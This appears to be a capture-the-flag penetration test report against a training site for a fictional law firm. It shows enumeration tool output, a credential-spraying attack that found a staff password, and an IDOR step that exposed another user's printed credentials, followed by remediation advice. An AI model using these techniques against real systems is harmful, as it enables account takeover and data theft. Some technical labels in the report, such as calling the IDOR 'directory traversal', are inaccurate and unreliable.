Introduction

The purpose of this report is to summarize the findings of a penetration test on the client’s system/application and find all 6 flags and note any vulnerabilities found.

Client: VulnLawyers

Testing Date: June 5, 2025

Scope: http://kaye.ctfio.com

Scope Duration: 59 Minutes

Executive Summary

A rapid penetration test of VulnLawyers’ website (kaye.ctfio.com) was conducted over 59 minutes. The test successfully exploited several vulnerabilities, leading to the discovery and acquisition of six flags. The primary vulnerabilities exploited were an IDOR (Insecure Direct Object Reference) and leveraged subdomain enumeration and directory traversal techniques.

Methodology

A comprehensive penetration test was conducted using the following tools:

• Dirsearch: This tool enabled directory enumeration, revealing potential entry points for further exploitation.

• FFuf: FFuf was used for subdomain enumeration, ensuring that all possible subdomains were identified and assessed for vulnerabilities.

• Caido: Caido was used for web application assessment and penetration testing, allowing for the identification of weaknesses in the web infrastructure and develop targeted attacks.

Technical Findings & Flag Acquisition

1. Flag 1: [^FLAG^E78DEBBFDFBEAFF1336B599B0724A530^FLAG^]

   • Vulnerability: Subdomain Enumeration via http://data.kaye.ctfio.com.

   • Method: Dirsearch was used to enumerate subdomains, revealing data.kaye.ctfio.com.

    :: Method           : GET
    :: URL              : <https://kaye.ctfio.com/>
    :: Wordlist         : FUZZ: /home/nexxsys/Documents/Hackinghub/Missions/VulnLawyers/subdomains.txt
    :: Header           : Host: [FUZZ.kaye.ctfio.com](<http://fuzz.kaye.ctfio.com/>)
    :: Header           : User-Agent: PENTEST
    :: Follow redirects : false
    :: Calibration      : false
    :: Timeout          : 10
    :: Threads          : 40
    :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
    :: Filter           : Response size: 1
    data                    [Status: 200, Size: 109, Words: 3, Lines: 1, Duration: 145ms]
    :: Progress: [1907/1907] :: Job [1/1] :: 273 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

---

• Navigating to the subdomain data.kaye.ctifio.com the first flag was found:

  

2. Flag 2: [^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]

   • Vulnerability: Directory Traversal via Redirect Chain

   • Method: Analyzing the HTML source code of the /login page at http://kaye.ctfio.com/login revealed a redirect to /lawyers-only and the second flag.

   • The diresearch scan results:

    [22:07:50] Starting:
    [22:07:53] 301 -  178B  - /js  ->  <https://kaye.ctfio.com/js/>
    [######              ] 31%   3570/11460       167/s       job:1/1  errors:0
    [22:08:26] 301 -  178B  - /css  ->  <https://kaye.ctfio.com/css/>
    [22:08:35] 301 -  178B  - /images  ->  <https://kaye.ctfio.com/images/>
    [22:08:35] 403 -  564B  - /images/
    [22:08:37] 403 -  564B  - /js/
    [22:08:39] 302 -    1KB - /login  ->  /denied
    [22:08:39] 302 -    1KB - /login/  ->  /denied

Target: https://kaye.ctfio.com/

• Time Stamps: The log indicates the scan started at 22:07:50 and the initial directory scans completed around 22:08:26.

• Key Findings & Interpretation:

  • /js Directory: Successfully discovered and linked to: https://kaye.ctfio.com/js/ – This is a crucial step. It likely revealed JavaScript files, which are frequently used for client-side scripts, often containing sensitive information or code snippets. [None found]

  • /css Directory: Similarly, https://kaye.ctfio.com/css/ was identified. CSS files can sometimes include hidden directories or paths. [None found]

  • /images Directory: Initially found and linked to successfully but then presented a 403 error. This suggests a restriction or a deliberately misleading path. It still contributed to the overall exploration. [None found]

  • /login Directory: Redirected to /denied. This indicates that the intended login path was intentionally misconfigured or secured with a deliberate error page. This was a critical piece of information. [Investigated]

• Using Caido to access the/login directory (http://kaye.ctfio.com/login) and viewing the response revealed the second flag [^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^] and a new path: /lawyers-only.

3. Flag 3: [^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]

   • Vulnerability: Directory Traversal via JSON Listing – Accessing the /users directory on the subdomain obtained through directory enumeration.

    dirsearch -u data.kaye.ctfio.com -w content.txt

    # Results
    Output File: /home/nexxsys/Documents/Hackinghub/Missions/VulnLawyers/reports/_data.kaye.ctfio.com/_25-06-05_22-48-14.txt

    Target: <https://data.kaye.ctfio.com/>

    [22:48:14] Starting:
    [22:48:45] 200 -  396B  - /users

    Task Completed

Target: data.kaye.ctfio.com

• Wordlist: content.txt (supplied by the client)

• Task Completed: The scan completed successfully, identifying a key directory.

• Result: 200 - 396B - /users – This is the significant finding. The 200 status code indicates a successful HTTP request. The 396B represents the content of the returned page. The /users directory is the critical target.

• Accessing https://data.kaye.ctfio.com/users presented a json (java script object notation) listing of user names and emails, and the third flag:

    {
    "users": [
    {
    "name": "Yusef Mcclain",
    "email": "yusef.mcclain@vulnlawyers.ctf"
    },
    {
    "name": "Shayne Cairns",
    "email": "shayne.cairns@vulnlawyers.ctf"
    },
    {
    "name": "Eisa Evans",
    "email": "eisa.evans@vulnlawyers.ctf"
    },
    {
    "name": "Jaskaran Lowe",
    "email": "jaskaran.lowe@vulnlawyers.ctf"
    },
    {
    "name": "Marsha Blankenship",
    "email": "marsha.blankenship@vulnlawyers.ctf"
    }
    ],
    "flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
    }

1. Flag 4: [^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]

   • Vulnerability: Password Enumeration via Caido – Using Caido’s automated password enumeration function, leveraging the list of users obtained through directory enumeration, successfully enumerated the password for Jaskaran Lowe, enabling access to the staff portal using the credentials.

   • Using the content from the json listing with Caido’s automate functionality, a credential spraying attack, to enumerate the passwords for the list of users obtained above with the client supplied passwords.txt file.

     

   • Findings: email=jaskaran.lowe@vulnlawyers.ctf & password=summer

   • Using these credentials, access to the staff portal was successful and revealed the fourth flag:

     

   • There is a single case visible which is managed by Shayne Cairns. Access to Shayne’s account will provide the permissions to manage this case and find the fifth flag.

4. Flag 5: [^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]

   • Vulnerability: IDOR (Insecure Direct Object Reference)

   • Method: Exploiting the IDOR vulnerability at http://kaye.ctfio.com/lawyers-only-profile-details/4. Changing the numerical identifier from 4 to 2 successfully revealed Shayne Cairns’s credentials and the fifth flag.

   • Logged in as Jaskaran

• Examining the request in Caido, an IDOR vulnerability is found:

• The numerical value enumerates user credentials.

• Changing the numerical value from 4 to 2, for user #2, enumerates their credentials and the fifth flag:

• Credentials found:

  • email=shayne.cairns@vulnlaywers.ctf password=q2V944&#2a1^3p

5. Flag 6: [^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]

   • Vulnerability: IDOR (Insecure Direct Object Reference) – As described above.

   • Logging in with Shayne’s credentials and deleting the case he has permissions to manage reveals the sixth, and final flag.

Overall Assessment

The rapid penetration test demonstrated vulnerabilities related to lack of proper input validation, inadequate access control mechanisms, and insufficient security configurations.

Risk Assessment

Target – http://kaye.ctfio.com

• Asset: The http://kaye.ctfio.com web application. Specifically, the user directory containing names, emails, and a flag.

  • Value: The data represents personally identifiable information (PII) – names, emails, and a flag.

• Threats:

  • Information Disclosure: The exposed directory reveals sensitive user information, potentially leading to identity theft or other malicious activities.

  • Enumeration Attacks: The directory could be used to enumerate users, allowing for further attacks.

  • Reputational Damage: A publicly accessible user directory reflects poorly on the organization's security posture.

• Vulnerabilities:

  • Lack of Access Controls: The directory is accessible without authentication, offering an open attack surface.

  • Unsecured Flag: The flag is exposed without any security measures.

  • General Lack of Security Practices: The overall security posture suggests a lack of investment in security controls – a direct result of the successful penetration.

• Likelihood: Very High – The application was successfully penetrated, confirming a high likelihood of future exploitation.

• Impact: Medium to High – Depending on the sensitivity of the data and the actions of a potential attacker, the impact could range from minor disruption to significant financial and legal consequences.

• Risk Level: Critical – Due to the combination of a very high likelihood and a medium to high impact.

• Mitigation Recommendations:

  • Immediately remove the exposed directory and the flag.

  • Implement strict access controls for all application functionality.

  • Implement robust input validation and output encoding to prevent injection attacks.

  • Implement strong authentication mechanisms for all user accounts.

  • Conduct a thorough security audit to identify and remediate any remaining vulnerabilities.

  • Implement a web application firewall (WAF) to protect against common web attacks.

  • Implement an incident response plan to quickly respond to security incidents and minimize their impact.

  • Residual Risk: High – Despite the implementation of mitigation recommendations, a residual risk remains due to the fundamental vulnerability of the exposed directory and the potential for future exploitation. Continuous monitoring and proactive security measures are crucial.

• Additional Considerations:

  • Root Cause Analysis: A thorough investigation is needed to determine how the vulnerability was introduced and to prevent similar issues in the future.

  • Security Awareness Training: Implement security awareness training for all developers and staff.

Target – Data.kaye.ctfio.com

• Asset: The data.kaye.ctfio.com web application. Specifically, the user directory containing names and email addresses.

  • Value: The data represents personally identifiable information (PII) – names and email addresses. Even without direct exploitation, the existence of this data represents a potential breach of privacy and compliance risks (depending on regulatory requirements).

• Threats:

  • Unauthorized Access: The exposed directory represents a significant attack surface. Threat actors could attempt to enumerate users, potentially leading to further exploitation.

  • Data Exfiltration: While no immediate exploitation was demonstrated, the possibility of targeted data exfiltration remains.

  • Credential Harvesting: Usernames and email addresses could be used in credential stuffing or phishing attacks.

  • Reputational Damage: A publicly accessible user directory reflects poorly on the security posture of the organization.

• Vulnerabilities:

  • Lack of Access Controls: The directory is readily accessible without authentication, offering an open attack surface.

  • Insufficient Input Validation: No apparent input validation exists, increasing the risk of injection attacks or data manipulation.

  • Weak Security Practices: The overall security posture suggests a lack of investment in security controls.

• Likelihood: High – The vulnerability of a publicly accessible, unauthenticated user directory is inherently high.

• Impact: Medium – Depending on the scale of the impact, the impact could range from minor reputational damage to significant financial and legal consequences.

• Risk Level: High – Due to the combination of a high likelihood and a medium impact.

• Mitigation Recommendations:

  • Implement Proper Input Validation

  • Enforce Robust Access Controls

  • Conduct Regular Security Audits

  • Update Software and Dependencies

  • Implement Strong Authentication Mechanisms

  • Use a Web Application Firewall (WAF)

  • Implement Incident Response Plan

  • Regularly Back Up Data

  • Residual Risk: Medium – Even with the implementation of mitigation recommendations, a residual risk remains due to the fundamental vulnerability of the exposed directory. Ongoing monitoring and proactive security measures are crucial.

Recommendation Summary

This penetration test highlights a significant security vulnerability – an exposed, unauthenticated directory containing sensitive data (names, emails, and a flag). Immediate action is required. The following needs to be prioritized:

• Immediate Remediation: Removing the exposed directory and flag is the highest priority.

• Strengthening Security Posture: A thorough security audit is essential to identify and rectify all remaining vulnerabilities.

• Proactive Security Measures: Implementing a Web Application Firewall (WAF) and developing an Incident Response Plan are crucial for long-term protection and rapid response to future incidents.

Essentially, this needs to be treated as a critical security issue demanding swift and decisive action to mitigate potential harm